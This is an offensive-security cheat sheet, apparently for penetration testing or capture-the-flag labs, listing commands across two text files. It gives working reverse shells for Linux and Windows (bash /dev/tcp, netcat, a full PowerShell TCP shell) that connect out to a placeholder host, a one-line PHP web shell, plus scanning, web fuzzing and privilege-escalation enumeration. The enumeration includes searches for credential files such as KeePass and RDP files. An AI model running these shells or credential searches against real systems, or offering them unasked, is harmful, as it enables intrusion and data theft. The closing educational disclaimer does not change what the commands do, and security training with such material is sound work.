References

This little cheat sheet was inspired by Siren. Please go support her at her blog: https://sirensecurity.io/blog/

Knock_Knock.txt:

=================Scans=====================
rustscan -a $IP -n --ulimit 70000 -t 5000 -- -A -Pn
#Standard Scan
sudo nmap -v -T3 -Pn -p 161 -sU
#SNMP
sudo nmap x.x.x.x -F -sU
#UDP 100 ports
=================Shellz=====================
===LINUX===
sh -i >& /dev/tcp/0.0.0.0/80 0>&1
#BASH -I
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 0.0.0.0 80 >/tmp/f
#NC MKFIFI
nc 0.0.0.0 80 -e sh
#NC
===Windows===
nc.exe 0.0.0.0 80 -e cmd
#NC
powershell -e (INSERT B64 of below)
$client = New-Object System.Net.Sockets.TCPClient("0.0.0.0",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
===WEB===
<?php system($_REQUEST['cmd']); ?>
#PHP
===Stabilze===
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
(Ctrl + Z)
stty raw -echo; fg
stty rows 38 columns 116
=================WebEnum=====================
===General===
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt:FUZZ -u http://site.local/FUZZ
#DIR BUST
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt:FUZZ -u http://site.local/FUZZ
#File fuzz
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://site.local/ -H 'Host: FUZZ.site.local' -ac
#VHOST FUZZING
feroxbuster -u http://site.local/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
#Ferox
===Wordpress===
sudo wpscan --url <site> --enumerate
#Auto
wpscan --url <site> --disable-tls-checks --enumerate p --enumerate t --enumerate u
#WPScan & SSL
wpscan --url <site> --enumerate p --plugins-detection aggressive
#Plugin scan

Xray.txt

=================LinuxEnum=====================
===Search===
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
#list Setuids
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null
#List setgids
Find <path> -type f -name <file_name>
#Search for files
find / -path /proc -prune -o -type d 2>/dev/null
#Locate Writable directories
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
#Locate writable files
/usr/sbin/getcap -r / 2>/dev/null
#Enumerate Capabilties manually
===Processes===
ps aux | grep root
#Display root owned processes
aa-enabled
#Check if apparmor is enabled
===refs===
ln -s <existing_source_file> <optional_symbolic_link>
#Symbolic link file
ln -s </target/directory> </directory/to/link/to>
#Symbolic link file
./pspy64 -pf -i 1000
#pspy usage
=================WindowsEnum=====================
===PS===
Get-MpComputerStatus
#Check Windows Defender Status
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
#List AppLocker Rules
netstat -ano
#Display Listening ports
select-string -Path C:path\to\search\*.txt -Pattern <String>
#Search file for string
Get-ChildItem C:\ -Recurse -Include *.kdbx *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
#Search for File Extensions
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
#Manual enmeration of running services
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
#List autoruns
===CMD===
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
#Verify UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
#Verify UAC level
wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows\\" | findstr /i /v """
#Manual query unquoted paths
tasklist /v /fi "username eq system"
#Display non system taskes                                                  
📚
The information within this article is intended solely for educational purposes. It is crucial that the techniques and methodologies discussed should only be used for educational and ethical purposes. They should never be leveraged in a manner that could cause unlawful harm or infringe upon the rights, security, or privacy of others. It is essential for anyone engaging with this content to approach it with a mindset of learning and understanding, ensuring that knowledge gained is used responsibly and ethically.